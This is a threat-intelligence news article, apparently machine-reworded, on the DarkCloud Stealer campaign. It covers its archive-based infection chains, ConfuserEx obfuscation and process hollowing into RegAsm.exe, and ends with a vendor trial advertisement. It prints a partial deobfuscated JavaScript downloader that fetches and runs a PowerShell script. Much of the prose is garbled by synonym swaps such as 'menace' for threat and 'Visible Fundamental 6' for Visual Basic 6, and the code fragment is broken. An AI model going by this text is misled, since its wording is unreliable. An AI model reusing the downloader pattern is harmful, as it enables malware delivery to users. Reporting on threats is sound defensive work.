A classy information-stealing malware marketing campaign has emerged, using superior obfuscation strategies and a number of an infection vectors to evade conventional safety controls.
The DarkCloud Stealer, first documented in current menace intelligence studies, represents a big evolution in cybercriminal techniques, using a fancy multi-stage supply mechanism that begins with seemingly innocuous archive information and culminates within the deployment of a closely obfuscated Visible Fundamental 6 payload.
The malware operators have developed three distinct an infection pathways, every designed to maximise the chance of profitable system compromise.
These embody JavaScript-initiated chains that obtain PowerShell scripts, 7Z archives containing Home windows Script Information with obfuscated JScript code, and TAR archives that function various entry factors.
Every vector demonstrates refined social engineering, typically masquerading as authentic enterprise paperwork or software program updates to bypass consumer suspicion.
Latest campaigns noticed since April 2025 point out the menace actors have considerably refined their strategy, shifting away from beforehand documented AutoIt-based implementations towards extra advanced .NET-based obfuscation frameworks.
Palo Alto Networks researchers recognized this shift as a part of a broader development amongst cybercriminals to undertake enterprise-grade growth instruments for malicious functions, making detection and evaluation significantly more difficult for safety groups.
The malware’s impression extends past conventional information theft, incorporating superior persistence mechanisms and anti-analysis options that enable it to function undetected for prolonged intervals.
The marketing campaign’s infrastructure, together with command-and-control servers internet hosting a number of malicious PowerShell scripts, suggests a well-resourced operation with vital planning and growth funding.
ConfuserEx Obfuscation and Course of Injection Mechanics
The technical sophistication of DarkCloud Stealer turns into obvious in its implementation of ConfuserEx-based obfuscation, a authentic .NET utility protector repurposed for malicious use.
An infection chain of current DarkCloud assaults (Supply – Palo Alto Networks)
The malware employs a number of layers of safety together with anti-tampering measures, image renaming, and management circulate obfuscation that transforms readable code into incomprehensible instruction sequences.
The deobfuscated JavaScript downloader reveals the preliminary an infection mechanism:-
var rDFG = “C:Temp” + RandomName() + “.ps1”;
var fso = new ActiveXObject(“Scripting.FileSystemObject”);
var shell = new ActiveXObject(“WScript.Shell”);
var http = new ActiveXObject(‘MSXML2.XMLHTTP’);
if (Dwnld(” rDFG)) {
ExePSh(rDFG);
}
This script downloads PowerShell payloads from open listing servers, creating randomly named information within the system’s non permanent listing.
The next PowerShell script accommodates Base64-encoded and AES-encrypted information that, when decrypted, reveals one other executable protected by ConfuserEx’s anti-tampering options.
The ultimate stage employs course of hollowing, injecting the decrypted VB6 payload named “holographies.exe” into RegAsm.exe, a authentic .NET Framework utility.
This system permits the malware to execute throughout the context of a trusted course of, successfully bypassing many endpoint safety options.
Crucial strings throughout the payload make the most of RC4 stream cipher encryption with distinctive keys, additional complicating static evaluation efforts and demonstrating the authors’ dedication to evasion.
Equip your SOC with full entry to the newest menace information from ANY.RUN TI Lookup that may Enhance incident response -> Get 14-day Free Trial
